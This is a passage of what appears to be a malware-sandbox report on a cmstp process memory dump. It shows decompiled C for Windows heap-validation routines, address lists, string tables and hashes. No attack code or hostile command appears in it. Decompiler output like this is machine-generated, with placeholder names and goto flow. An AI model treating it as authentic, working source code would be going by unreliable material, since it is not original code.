							_t412 = _a20;
							_t327 = _t326 & 0x0000ffff;
							L17:
							 *((intOrPtr*)(_t412 + _t327 * 4)) =  *((intOrPtr*)(_t412 + _t327 * 4)) + _t342;
							goto L18;
						}
						_t327 = _t326 & 0x00007fff;
						if(_t327 >= 0x81) {
							goto L18;
						}
						_t412 = _a24;
						goto L17;
					}
					L86:
				} while (_t415 <  *((intOrPtr*)(_t332 + 0x28)));
				_t189 = _v12;
				goto L88;
			}

0x05194af7
0x05194afb
0x05194afd
0x05194b01
0x05194b03
0x05194b08
0x05194b0a
0x05194b0f
0x05194eb5
0x05194eb5
0x05194ebb
0x051950d5
0x051950d8
0x05194ff6
0x00000000
0x05194ff6
0x051950de
0x051950e4
0x051950e8
0x05195107
0x0519510c
0x051950ea
0x051950ff
0x05195104
0x05195112
0x05195115
0x05195118
0x05195119
0x051950cb
0x051950cb
0x051950af
0x00000000
0x051950af
0x05194ecb
0x051950b6
0x051950bb
0x05194ed1
0x05194ee6
0x05194eeb
0x051950c1
0x051950c2
0x051950c5
0x051950c6
0x00000000
0x00000000
0x00000000
0x00000000
0x05194b15
0x05194b15
0x05194b1c
0x05194b1e
0x05194b23
0x05194b27
0x05194b33
0x05194b38
0x05194b3a
0x05194b3c
0x05194b41
0x05194b41
0x05194b3a
0x05194b52
0x05195045
0x0519504b
0x0519504f
0x0519506e
0x05195073
0x05195051
0x05195066
0x0519506b
0x05195083
0x05195088
0x05195088
0x0519508a
0x05195091
0x05195099
0x05195099
0x0519509d
0x051950a7
0x051950ad
0x051950ad
0x051950ad
0x00000000
0x0519509d
0x05194b58
0x05194b5b
0x05194b5e
0x05194b63
0x05194b66
0x05194b69
0x05194b6f
0x05194be4
0x05194bf0
0x05194bf2
0x05194bf5
0x05194dc3
0x05194dc6
0x05194dc9
0x05194dce
0x05194dce
0x05194dd0
0x05194dd0
0x05194dd5
0x05194def
0x05194dd7
0x05194de7
0x05194de7
0x05194df3
0x05195001
0x05195007
0x0519500b
0x0519502a
0x0519502f
0x0519500d
0x05195022
0x05195027
0x05195039
0x0519503a
0x0519503b
0x00000000
0x05194df9
0x05194dfd
0x05194e90
0x05194e94
0x05194e9e
0x05194ea4
0x05194ea4
0x05194ea4
0x05194ea6
0x05194ea6
0x00000000
0x05194ea6
0x05194e03
0x05194e08
0x05194f88
0x05194f92
0x05194f99
0x05194f9c
0x05194fe0
0x05194fe4
0x05194fee
0x05194ff4
0x05194ff4
0x05194ff4
0x00000000
0x05194fe4
0x05194f9e
0x05194fa4
0x05194fa8
0x05194fc7
0x05194fcc
0x05194faa
0x05194fbf
0x05194fc4
0x05194fd2
0x05194fd5
0x05194fd6
0x05194f34
0x05194f34
0x00000000
0x05194f39
0x05194e0e
0x05194e14
0x05194e1b
0x05194e25
0x05194e2b
0x05194e2b
0x05194e33
0x05194e38
0x05194e8a
0x05194e8a
0x00000000
0x05194e3a
0x05194e3e
0x05194e43
0x05194e47
0x05194e53
0x05194e58
0x05194e5a
0x05194e5c
0x05194e61
0x05194e61
0x05194e5a
0x05194e6e
0x05194f41
0x05194f47
0x05194f4b
0x05194f6a
0x05194f6f
0x05194f4d
0x05194f62
0x05194f67
0x05194f7f
0x05194f80
0x05194f81
0x00000000
0x05194e74
0x05194e78
0x05194e82
0x05194e88
0x05194e88
0x00000000
0x05194e78
0x05194e6e
0x05194e38
0x05194df3
0x05194bfe
0x05194c01
0x05194c04
0x05194c07
0x05194c09
0x05194c0c
0x05194c0e
0x05194c0e
0x05194c11
0x05194c11
0x05194c0c
0x05194c14
0x05194c17
0x05194dae
0x05194db2
0x05194db7
0x05194dba
0x05194dbd
0x05194ef1
0x05194ef7
0x05194efb
0x05194f1a
0x05194f1f
0x05194efd
0x05194f12
0x05194f17
0x05194f2b
0x05194f2b
0x05194f2d
0x05194f2e
0x05194f2f
0x00000000
0x05194f2f
0x00000000
0x05194c1d
0x05194c1d
0x05194c20
0x05194c23
0x05194c26
0x05194c29
0x05194c2c
0x05194c2e
0x05194d91
0x05194d91
0x05194d92
0x05194d97
0x05194d9e
0x00000000
0x05194d9e
0x05194c34
0x05194c37
0x05194c39
0x05194c3c
0x00000000
0x00000000
0x05194c45
0x05194c48
0x05194c4e
0x05194c50
0x05194c78
0x05194c78
0x05194c7b
0x05194c7d
0x05194c80
0x05194c84
0x05194cad
0x05194cad
0x05194cb0
0x05194cb8
0x05194cbb
0x05194cbe
0x05194cc1
0x05194cc7
0x05194cdc
0x05194cc9
0x05194cd2
0x05194cd4
0x05194cd4
0x05194cde
0x05194ce0
0x05194d13
0x05194d13
0x05194d16
0x05194d18
0x05194d29
0x05194d2a
0x05194d2c
0x05194d34
0x05194d1a
0x05194d1a
0x05194d1a
0x05194d1d
0x05194d1f
0x05194d22
0x05194d24
0x05194d24
0x05194d3c
0x05194d3f
0x05194d45
0x05194d47
0x05194d6c
0x05194d6c
0x05194d70
0x05194d7e
0x05194d84
0x05194d84
0x00000000
0x05194d49
0x05194d49
0x05194d56
0x05194d56
0x05194d59
0x00000000
0x00000000
0x05194d4e
0x05194d50
0x05194d52
0x05194d8e
0x05194d5d
0x05194d5f
0x05194d67
0x00000000
0x05194d67
0x05194d54
0x05194d54
0x05194d5b
0x00000000
0x05194d5b
0x05194ce2
0x05194ce2
0x05194ce5
0x05194ce5
0x05194ce7
0x05194cfb
0x05194ce9
0x05194ce9
0x05194cec
0x05194cef
0x05194cf1
0x05194cf3
0x05194cf3
0x05194cf3
0x05194cf6
0x05194cf6
0x05194d02
0x05194d05
0x00000000
0x00000000
0x05194d07
0x05194d0f
0x05194d11
0x00000000
0x00000000
0x00000000
0x05194d11
0x00000000
0x05194ce5
0x05194ce0
0x05194c8a
0x05194c8f
0x05194c91
0x00000000
0x00000000
0x05194c9d
0x00000000
0x05194c9d
0x05194c52
0x05194c5f
0x05194c5f
0x05194c62
0x00000000
0x00000000
0x05194c57
0x05194c59
0x05194c5b
0x05194caa
0x05194c66
0x05194c68
0x05194c70
0x05194c75
0x00000000
0x05194c75
0x05194c5d
0x05194c5d
0x05194c64
0x00000000
0x05194c64
0x05194c17
0x05194b75
0x05194bc4
0x05194bc8
0x00000000
0x00000000
0x05194bd9
0x00000000
0x00000000
0x00000000
0x05194b77
0x05194b7a
0x05194b8c
0x05194b7c
0x05194b7e
0x05194b83
0x05194b86
0x05194b86
0x05194b90
0x05194b93
0x00000000
0x00000000
0x05194b95
0x05194bab
0x05194bb0
0x00000000
0x00000000
0x05194bb2
0x05194bb9
0x00000000
0x00000000
0x05194bbb
0x05194bbe
0x05194bc1
0x05194bc1
0x00000000
0x05194bc1
0x05194b97
0x05194ba4
0x00000000
0x00000000
0x05194ba6
0x00000000
0x05194ba6
0x05194ea9
0x05194ea9
0x05194eb2
0x00000000

Strings

Heap block at %p has corrupted PreviousSize (%lx), xrefs: 05194F81
Heap Segment at %p contains invalid NumberOfUnCommittedRanges (%x != %x), xrefs: 05195119
Heap entry %p has incorrect PreviousSize field (%04x instead of %04x), xrefs: 0519508C
Heap block at %p has incorrect segment offset (%x), xrefs: 0519503B
Heap block at %p is not last block in segment (%p), xrefs: 05194FD6
Free Heap block %p modified at %p after it was freed, xrefs: 05194F2F
Heap Segment at %p contains invalid NumberOfUnCommittedPages (%x != %x), xrefs: 051950C6
HEAP[%wZ]: , xrefs: 05194EE1, 05194F0D, 05194F5D, 05194FBA, 0519501D, 05195061, 051950FA
HEAP: , xrefs: 05194F1A, 05194F6A, 05194FC7, 0519502A, 0519506E, 051950B6, 05195107

Memory Dump Source

Source File: 00000010.00000002.516081168.00000000050B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 050B0000, based on PE: true

Associated: 00000010.00000002.516489790.00000000051CB000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000010.00000002.516510294.00000000051CF000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_50b0000_cmstp.jbxd

Similarity

API ID:
String ID: Free Heap block %p modified at %p after it was freed$HEAP: $HEAP[%wZ]: $Heap Segment at %p contains invalid NumberOfUnCommittedPages (%x != %x)$Heap Segment at %p contains invalid NumberOfUnCommittedRanges (%x != %x)$Heap block at %p has corrupted PreviousSize (%lx)$Heap block at %p has incorrect segment offset (%x)$Heap block at %p is not last block in segment (%p)$Heap entry %p has incorrect PreviousSize field (%04x instead of %04x)
API String ID: 0-3591852110
Opcode ID: a6f2d7d96210aa61014c22a4911661c55db44b7b25da5838819cf540704202ed
Instruction ID: a8c84390a552fc8144c253096878e78841fbad8f1cf13a4604c2c3e971963f5f
Opcode Fuzzy Hash: a6f2d7d96210aa61014c22a4911661c55db44b7b25da5838819cf540704202ed
Instruction Fuzzy Hash: D612CE346046429FDF2DCF28C494BBAB7F2FF48704F198459E4868B641D7B9E882CB90

Uniqueness

Uniqueness Score: -1.00%

Function 05194496 Relevance: 10.4, Strings: 8, Instructions: 417
COMMONCrypto

Download Yara Rule

C-Code - Quality: 56%

			E05194496(signed int* __ecx, void* __edx) {
				signed int _v5;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed char _v24;
				signed int* _v28;
				char _v32;
				signed int* _v36;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				void* _t150;
				intOrPtr _t151;
				signed char _t156;
				intOrPtr _t157;
				unsigned int _t169;
				intOrPtr _t170;
				signed int* _t183;
				signed char _t184;
				intOrPtr _t191;
				signed int _t201;
				intOrPtr _t203;
				intOrPtr _t212;
				intOrPtr _t220;
				signed int _t230;
				signed int _t241;
				signed int _t244;
				void* _t259;
				signed int _t260;
				signed int* _t261;
				intOrPtr* _t262;
				signed int _t263;
				signed int* _t264;
				signed int _t267;
				signed int* _t268;
				void* _t270;
				void* _t281;
				signed short _t285;
				signed short _t289;
				signed int _t291;
				signed int _t298;
				signed char _t303;
				signed char _t308;
				signed int _t314;
				intOrPtr _t317;
				unsigned int _t319;
				signed int* _t325;
				signed int _t326;
				signed int _t327;
				intOrPtr _t328;
				signed int _t329;
				signed int _t330;
				signed int* _t331;
				signed int _t332;
				signed int _t350;

				_t259 = __edx;
				_t331 = __ecx;
				_v28 = __ecx;
				_v20 = 0;
				_v12 = 0;
				_t150 = E051949A4(__ecx);
				_t267 = 1;
				if(_t150 == 0) {
					L61:
					_t151 =  *[fs:0x30];
					__eflags =  *((char*)(_t151 + 2));
					if( *((char*)(_t151 + 2)) != 0) {
						 *0x51c6378 = _t267;
						asm("int3");
						 *0x51c6378 = 0;
					}
					__eflags = _v12;
					if(_v12 != 0) {
						_t105 =  &_v16;
						 *_t105 = _v16 & 0x00000000;
						__eflags =  *_t105;
						E0510174B( &_v12,  &_v16, 0x8000);
					}
					L65:
					__eflags = 0;
					return 0;
				}
				if(_t259 != 0 || (__ecx[0x10] & 0x20000000) != 0) {
					_t268 =  &(_t331[0x30]);
					_v32 = 0;
					_t260 =  *_t268;
					_t308 = 0;
					_v24 = 0;
					while(_t268 != _t260) {
						_t260 =  *_t260;
						_v16 =  *_t325 & 0x0000ffff;
						_t156 = _t325[0];
						_v28 = _t325;
						_v5 = _t156;
						__eflags = _t156 & 0x00000001;
						if((_t156 & 0x00000001) != 0) {
							_t157 =  *[fs:0x30];
							__eflags =  *(_t157 + 0xc);
							if( *(_t157 + 0xc) == 0) {
								_push("HEAP: ");
								E050DB150();
							} else {
								E050DB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
							}
							_push(_t325);
							E050DB150("dedicated (%04Ix) free list element %p is marked busy\n", _v16);
							L32:
							_t270 = 0;
							__eflags = _t331[0x13];
							if(_t331[0x13] != 0) {
								_t325[0] = _t325[0] ^ _t325[0] ^  *_t325;
								 *_t325 =  *_t325 ^ _t331[0x14];
							}
							L60:
							_t267 = _t270 + 1;
							__eflags = _t267;
							goto L61;
						}
						_t169 =  *_t325 & 0x0000ffff;
						__eflags = _t169 - _t308;
						if(_t169 < _t308) {
							_t170 =  *[fs:0x30];
							__eflags =  *(_t170 + 0xc);
							if( *(_t170 + 0xc) == 0) {
								_push("HEAP: ");
								E050DB150();
							} else {
								E050DB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
							}
							E050DB150("Non-Dedicated free list element %p is out of order\n", _t325);
							goto L32;
						} else {
							__eflags = _t331[0x13];
							_t308 = _t169;
							_v24 = _t308;
							if(_t331[0x13] != 0) {
								_t325[0] = _t169 >> 0x00000008 ^ _v5 ^ _t308;
								 *_t325 =  *_t325 ^ _t331[0x14];
								__eflags =  *_t325;
							}
							_t26 =  &_v32;
							 *_t26 = _v32 + 1;
							__eflags =  *_t26;
							continue;
						}
					}
					_v16 = 0x208 + (_t331[0x21] & 0x0000ffff) * 4;
					if( *0x51c6350 != 0 && _t331[0x2f] != 0) {
						_push(4);
						_push(0x1000);
						_push( &_v16);
						_push(0);
						_push( &_v12);
						_push(0xffffffff);
						if(E05119660() >= 0) {
							_v20 = _v12 + 0x204;
						}
					}
					_t183 =  &(_t331[0x27]);
					_t281 = 0x81;
					_t326 =  *_t183;
					if(_t183 == _t326) {
						L49:
						_t261 =  &(_t331[0x29]);
						_t184 = 0;
						_t327 =  *_t261;
						_t282 = 0;
						_v24 = 0;
						_v36 = 0;
						__eflags = _t327 - _t261;
						if(_t327 == _t261) {
							L53:
							_t328 = _v32;
							_v28 = _t331;
							__eflags = _t328 - _t184;
							if(_t328 == _t184) {
								__eflags = _t331[0x1d] - _t282;
								if(_t331[0x1d] == _t282) {
									__eflags = _v12;
									if(_v12 == 0) {
										L82:
										_t267 = 1;
										__eflags = 1;
										goto L83;
									}
									_t329 = _t331[0x2f];
									__eflags = _t329;
									if(_t329 == 0) {
										L77:
										_t330 = _t331[0x22];
										__eflags = _t330;
										if(_t330 == 0) {
											L81:
											_t129 =  &_v16;
											 *_t129 = _v16 & 0x00000000;
											__eflags =  *_t129;
											E0510174B( &_v12,  &_v16, 0x8000);
											goto L82;
										}
										_t314 = _t331[0x21] & 0x0000ffff;
										_t285 = 1;
										__eflags = 1 - _t314;
										if(1 >= _t314) {
											goto L81;
										} else {
											goto L79;
										}
										while(1) {
											L79:
											_t330 = _t330 + 0x40;
											_t332 = _t285 & 0x0000ffff;
											_t262 = _v20 + _t332 * 4;
											__eflags =  *_t262 -  *((intOrPtr*)(_t330 + 8));
											if( *_t262 !=  *((intOrPtr*)(_t330 + 8))) {
												break;
											}
											_t285 = _t285 + 1;
											__eflags = _t285 - _t314;
											if(_t285 < _t314) {
												continue;
											}
											goto L81;
										}
										_t191 =  *[fs:0x30];
										__eflags =  *(_t191 + 0xc);
										if( *(_t191 + 0xc) == 0) {
											_push("HEAP: ");
											E050DB150();
										} else {
											E050DB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
										}
										_push(_t262);
										_push( *((intOrPtr*)(_v20 + _t332 * 4)));
										_t148 = _t330 + 0x10; // 0x10
										_push( *((intOrPtr*)(_t330 + 8)));
										E050DB150("Tag %04x (%ws) size incorrect (%Ix != %Ix) %p\n", _t332);
										L59:
										_t270 = 0;
										__eflags = 0;
										goto L60;
									}
									_t289 = 1;
									__eflags = 1;
									while(1) {
										_t201 = _v12;
										_t329 = _t329 + 0xc;
										_t263 = _t289 & 0x0000ffff;
										__eflags =  *((intOrPtr*)(_t201 + _t263 * 4)) -  *((intOrPtr*)(_t329 + 8));
										if( *((intOrPtr*)(_t201 + _t263 * 4)) !=  *((intOrPtr*)(_t329 + 8))) {
											break;
										}
										_t289 = _t289 + 1;
										__eflags = _t289 - 0x81;
										if(_t289 < 0x81) {
											continue;
										}
										goto L77;
									}
									_t203 =  *[fs:0x30];
									__eflags =  *(_t203 + 0xc);
									if( *(_t203 + 0xc) == 0) {
										_push("HEAP: ");
										E050DB150();
									} else {
										E050DB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
									}
									_t291 = _v12;
									_push(_t291 + _t263 * 4);
									_push( *((intOrPtr*)(_t291 + _t263 * 4)));
									_push( *((intOrPtr*)(_t329 + 8)));
									E050DB150("Pseudo Tag %04x size incorrect (%Ix != %Ix) %p\n", _t263);
									goto L59;
								}
								_t212 =  *[fs:0x30];
								__eflags =  *(_t212 + 0xc);
								if( *(_t212 + 0xc) == 0) {
									_push("HEAP: ");
									E050DB150();
								} else {
									E050DB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
								}
								_push(_t331[0x1d]);
								_push(_v36);
								_push("Total size of free blocks in arena (%Id) does not match number total in heap header (%Id)\n");
								L58:
								E050DB150();
								goto L59;
							}
							_t220 =  *[fs:0x30];
							__eflags =  *(_t220 + 0xc);
							if( *(_t220 + 0xc) == 0) {
								_push("HEAP: ");
								E050DB150();
							} else {
								E050DB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
							}
							_push(_t328);
							_push(_v24);
							_push("Number of free blocks in arena (%ld) does not match number in the free lists (%ld)\n");
							goto L58;
						} else {
							goto L50;
						}
						while(1) {
							L50:
							_t92 = _t327 - 0x10; // -24
							_t282 = _t331;
							_t230 = E05194AEF(_t331, _t92, _t331,  &_v24,  &_v36,  &_v28, _v20, _v12);
							__eflags = _t230;
							if(_t230 == 0) {
								goto L59;
							}
							_t327 =  *_t327;
							__eflags = _t327 - _t261;
							if(_t327 != _t261) {
								continue;
							}
							_t184 = _v24;
							_t282 = _v36;
							goto L53;
						}
						goto L59;
					} else {
						while(1) {
							_t39 = _t326 + 0x18; // 0x10
							_t264 = _t39;
							if(_t331[0x13] != 0) {
								_t319 = _t331[0x14] ^  *_t264;
								 *_t264 = _t319;
								_t303 = _t319 >> 0x00000010 ^ _t319 >> 0x00000008 ^ _t319;
								_t348 = _t319 >> 0x18 - _t303;
								if(_t319 >> 0x18 != _t303) {
									_push(_t303);
									E0518FA2B(_t264, _t331, _t264, _t326, _t331, _t348);
								}
								_t281 = 0x81;
							}
							_t317 = _v20;
							if(_t317 != 0) {
								_t241 =  *(_t326 + 0xa) & 0x0000ffff;
								_t350 = _t241;
								if(_t350 != 0) {
									if(_t350 >= 0) {
										__eflags = _t241 & 0x00000800;
										if(__eflags == 0) {
											__eflags = _t241 - _t331[0x21];
											if(__eflags < 0) {
												_t298 = _t241;
												_t65 = _t317 + _t298 * 4;
												 *_t65 =  *(_t317 + _t298 * 4) + ( *(_t326 + 0x10) >> 3);
												__eflags =  *_t65;
											}
										}
									} else {
										_t244 = _t241 & 0x00007fff;
										if(_t244 < _t281) {
											 *((intOrPtr*)(_v12 + _t244 * 4)) =  *((intOrPtr*)(_v12 + _t244 * 4)) + ( *(_t326 + 0x10) >> 3);
										}
									}
								}
							}
							if(( *(_t326 + 0x1a) & 0x00000004) != 0 && E051823E3(_t331, _t264) == 0) {
								break;
							}
							if(_t331[0x13] != 0) {
								_t264[0] = _t264[0] ^ _t264[0] ^  *_t264;
								 *_t264 =  *_t264 ^ _t331[0x14];
							}
							_t326 =  *_t326;
							if( &(_t331[0x27]) == _t326) {
								goto L49;
							} else {
								_t281 = 0x81;
								continue;
							}
						}
						__eflags = _t331[0x13];
						if(_t331[0x13] != 0) {
							 *(_t326 + 0x1b) =  *(_t326 + 0x1a) ^  *(_t326 + 0x19) ^  *(_t326 + 0x18);
							 *(_t326 + 0x18) =  *(_t326 + 0x18) ^ _t331[0x14];
						}
						goto L65;
					}
				} else {
					L83:
					return _t267;
				}
			}

0x051944a1
0x051944a3
0x051944a7
0x051944ac
0x051944af
0x051944b2
0x051944b9
0x051944bc
0x051947f2
0x051947f2
0x051947f8
0x051947fc
0x051947fe
0x05194804
0x05194805
0x05194805
0x0519480c
0x05194810
0x05194812
0x05194812
0x05194812
0x05194822
0x05194822
0x05194827
0x05194827
0x00000000
0x05194827
0x051944c4
0x051944d3
0x051944d9
0x051944dc
0x051944de
0x051944e0
0x05194560
0x05194520
0x05194522
0x05194525
0x05194528
0x0519452b
0x0519452e
0x05194530
0x05194697
0x0519469d
0x051946a1
0x051946c0
0x051946c5
0x051946a3
0x051946b8
0x051946bd
0x051946cb
0x051946d4
0x05194677
0x05194677
0x05194679
0x0519467c
0x0519468a
0x05194690
0x05194690
0x051947f1
0x051947f1
0x051947f1
0x00000000
0x051947f1
0x05194536
0x05194539
0x0519453c
0x05194636
0x0519463c
0x05194640
0x0519465f
0x05194664
0x05194642
0x05194657
0x0519465c
0x05194670
0x00000000
0x05194542
0x05194542
0x05194546
0x05194548
0x0519454b
0x05194555
0x0519455b
0x0519455b
0x0519455b
0x0519455d
0x0519455d
0x0519455d
0x00000000
0x0519455d
0x0519453c
0x05194579
0x0519457c
0x05194587
0x05194589
0x05194591
0x05194592
0x05194597
0x05194598
0x051945a1
0x051945ab
0x051945ab
0x051945a1
0x051945ae
0x051945b4
0x051945b9
0x051945bd
0x05194759
0x05194759
0x0519475f
0x05194761
0x05194763
0x05194765
0x05194768
0x0519476b
0x0519476d
0x0519479c
0x0519479c
0x0519479f
0x051947a2
0x051947a4
0x05194830
0x05194833
0x05194879
0x0519487d
0x051948f1
0x051948f3
0x051948f3
0x00000000
0x051948f3
0x0519487f
0x05194885
0x05194887
0x051948a8
0x051948a8
0x051948ae
0x051948b0
0x051948dc
0x051948dc
0x051948dc
0x051948dc
0x051948ec
0x00000000
0x051948ec
0x051948b2
0x051948bc
0x051948be
0x051948c1
0x00000000
0x00000000
0x00000000
0x00000000
0x051948c3
0x051948c3
0x051948c6
0x051948c9
0x051948cc
0x051948d1
0x051948d4
0x00000000
0x00000000
0x051948d6
0x051948d7
0x051948da
0x00000000
0x00000000
0x00000000
0x051948da
0x0519494f
0x05194955
0x05194959
0x05194978
0x0519497d
0x0519495b
0x05194970
0x05194975
0x05194986
0x05194987
0x0519498a
0x0519498d
0x05194997
0x051947ef
0x051947ef
0x051947ef
0x00000000
0x051947ef
0x05194890
0x05194890
0x05194891
0x05194891
0x05194894
0x05194897
0x0519489d
0x051948a0
0x00000000
0x00000000
0x051948a2
0x051948a3
0x051948a6
0x00000000
0x00000000
0x00000000
0x051948a6
0x051948fb
0x05194901
0x05194905
0x05194924
0x05194929
0x05194907
0x0519491c
0x05194921
0x0519492f
0x05194935
0x05194936
0x05194939
0x05194942
0x00000000
0x05194947
0x05194835
0x0519483b
0x0519483f
0x0519485e
0x05194863
0x05194841
0x05194856
0x0519485b
0x05194869
0x0519486c
0x0519486f
0x051947e7
0x051947e7
0x00000000
0x051947ec
0x051947aa
0x051947b0
0x051947b4
0x051947d3
0x051947d8
0x051947b6
0x051947cb
0x051947d0
0x051947de
0x051947df
0x051947e2
0x00000000
0x00000000
0x00000000
0x00000000
0x0519476f
0x0519476f
0x05194778
0x05194785
0x05194787
0x0519478c
0x0519478e
0x00000000
0x00000000
0x05194790
0x05194792
0x05194794
0x00000000
0x00000000
0x05194796
0x05194799
0x00000000
0x05194799
0x00000000
0x051945c3
0x051945c3
0x051945c7
0x051945c7
0x051945ca
0x051945cf
0x051945d3
0x051945df
0x051945e4
0x051945e6
0x051945e8
0x051945ed
0x051945ed
0x051945f2
0x051945f2
0x051945f7
0x051945fc
0x05194602
0x05194606
0x05194609
0x0519460f
0x051946de
0x051946e3
0x051946e5
0x051946ec
0x051946ee
0x051946f6
0x051946f6
0x051946f6
0x051946f6
0x051946ec
0x05194615
0x05194615
0x0519461d
0x0519462e
0x0519462e
0x0519461d
0x0519460f
0x05194609
0x051946fd
0x00000000
0x00000000
0x05194710
0x0519471a
0x05194720
0x05194720
0x05194722
0x0519472c
0x00000000
0x0519472e
0x0519472e
0x00000000
0x0519472e
0x0519472c
0x05194738
0x0519473c
0x0519474b
0x05194751
0x05194751
0x00000000
0x0519473c
0x051948f4
0x051948f4
0x00000000
0x051948f4

Strings

Total size of free blocks in arena (%Id) does not match number total in heap header (%Id), xrefs: 0519486F
dedicated (%04Ix) free list element %p is marked busy, xrefs: 051946CF
Tag %04x (%ws) size incorrect (%Ix != %Ix) %p, xrefs: 05194992
Non-Dedicated free list element %p is out of order, xrefs: 0519466B
HEAP[%wZ]: , xrefs: 05194652, 051946B3, 051947C6, 05194851, 05194917, 0519496B
HEAP: , xrefs: 0519465F, 051946C0, 051947D3, 0519485E, 05194924, 05194978
Number of free blocks in arena (%ld) does not match number in the free lists (%ld), xrefs: 051947E2
Pseudo Tag %04x size incorrect (%Ix != %Ix) %p, xrefs: 0519493D

Memory Dump Source

Source File: 00000010.00000002.516081168.00000000050B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 050B0000, based on PE: true

Associated: 00000010.00000002.516489790.00000000051CB000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000010.00000002.516510294.00000000051CF000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_50b0000_cmstp.jbxd

Similarity

API ID:
String ID: HEAP: $HEAP[%wZ]: $Non-Dedicated free list element %p is out of order$Number of free blocks in arena (%ld) does not match number in the free lists (%ld)$Pseudo Tag %04x size incorrect (%Ix != %Ix) %p$Tag %04x (%ws) size incorrect (%Ix != %Ix) %p$Total size of free blocks in arena (%Id) does not match number total in heap header (%Id)$dedicated (%04Ix) free list element %p is marked busy
API String ID: 0-1357697941
Opcode ID: e7ee3419c940bca8fb7aa3632c07f920b13572a1772c98e489e0da5b38061f18
Instruction ID: b8e5c53fcd9cffd0a7bdac734be398057314c968f81a4f20e7970683da64b261
Opcode Fuzzy Hash: e7ee3419c940bca8fb7aa3632c07f920b13572a1772c98e489e0da5b38061f18
Instruction Fuzzy Hash: A4F12235604646AFDF29DFA8C484BFAB7F2FF49304F198059E0469B241D7B0A986CF51

Uniqueness

Uniqueness Score: -1.00%

Function 050FA309 Relevance: 8.2, Strings: 6, Instructions: 687
COMMONCrypto

Download Yara Rule

C-Code - Quality: 72%

			E050FA309(signed int __ecx, signed int __edx, signed int _a4, char _a8) {
				char _v8;
				signed short _v12;
				signed short _v16;
				signed int _v20;
				signed int _v24;
				signed short _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				signed int _v48;
				unsigned int _v52;
				signed int _v56;
				void* _v60;
				intOrPtr _v64;
				void* _v72;
				void* __ebx;
				void* __edi;
				void* __ebp;
				unsigned int _t246;
				signed char _t247;
				signed short _t249;
				unsigned int _t256;
				signed int _t262;
				signed int _t265;
				signed int _t266;
				signed int _t267;
				intOrPtr _t270;
				signed int _t280;
				signed int _t286;
				signed int _t289;
				intOrPtr _t290;
				signed int _t291;
				signed int _t317;
				signed short _t320;
				intOrPtr _t327;
				signed int _t339;
				signed int _t344;
				signed int _t347;
				intOrPtr _t348;
				signed int _t350;
				signed int _t352;
				signed int _t353;
				signed int _t356;
				intOrPtr _t357;
				intOrPtr _t366;
				signed int _t367;
				signed int _t370;
				intOrPtr _t371;
				signed int _t372;
				signed int _t394;
				signed short _t402;
				intOrPtr _t404;
				intOrPtr _t415;
				signed int _t430;
				signed int _t433;
				signed int _t437;
				signed int _t445;
				signed short _t446;
				signed short _t449;
				signed short _t452;
				signed int _t455;
				signed int _t460;
				signed short* _t468;
				signed int _t480;
				signed int _t481;
				signed int _t483;
				intOrPtr _t484;
				signed int _t491;
				unsigned int _t506;
				unsigned int _t508;
				signed int _t513;
				signed int _t514;
				signed int _t521;
				signed short* _t533;
				signed int _t541;
				signed int _t543;
				signed int _t546;
				unsigned int _t551;
				signed int _t553;

				_t450 = __ecx;
				_t553 = __ecx;
				_t539 = __edx;
				_v28 = 0;
				_v40 = 0;
				if(( *(__ecx + 0xcc) ^  *0x51c8a68) != 0) {
					_push(_a4);
					_t513 = __edx;
					L11:
					_t246 = E050FA830(_t450, _t513);
					L7:
					return _t246;
				}
				if(_a8 != 0) {
					__eflags =  *(__edx + 2) & 0x00000008;
					if(( *(__edx + 2) & 0x00000008) != 0) {
						 *((intOrPtr*)(__ecx + 0x230)) =  *((intOrPtr*)(__ecx + 0x230)) - 1;
						_t430 = E050FDF24(__edx,  &_v12,  &_v16);
						__eflags = _t430;
						if(_t430 != 0) {
							_t157 = _t553 + 0x234;
							 *_t157 =  *(_t553 + 0x234) - _v16;
							__eflags =  *_t157;
						}
					}
					_t445 = _a4;
					_t514 = _t539;
					_v48 = _t539;
					L14:
					_t247 =  *((intOrPtr*)(_t539 + 6));
					__eflags = _t247;
					if(_t247 == 0) {
						_t541 = _t553;
					} else {
						_t541 = (_t539 & 0xffff0000) - ((_t247 & 0x000000ff) << 0x10) + 0x10000;
						__eflags = _t541;
					}
					_t249 = 7 + _t445 * 8 + _t514;
					_v12 = _t249;
					__eflags =  *_t249 - 3;
					if( *_t249 == 3) {
						_v16 = _t514 + _t445 * 8 + 8;
						E050D9373(_t553, _t514 + _t445 * 8 + 8);
						_t452 = _v16;
						_v28 =  *(_t452 + 0x10);
						 *((intOrPtr*)(_t541 + 0x30)) =  *((intOrPtr*)(_t541 + 0x30)) - 1;
						_v36 =  *(_t452 + 0x14);
						 *((intOrPtr*)(_t541 + 0x2c)) =  *((intOrPtr*)(_t541 + 0x2c)) - ( *(_t452 + 0x14) >> 0xc);
						 *((intOrPtr*)(_t553 + 0x1e8)) =  *((intOrPtr*)(_t553 + 0x1e8)) +  *(_t452 + 0x14);
						 *((intOrPtr*)(_t553 + 0x1f8)) =  *((intOrPtr*)(_t553 + 0x1f8)) - 1;
						_t256 =  *(_t452 + 0x14);
						__eflags = _t256 - 0x7f000;
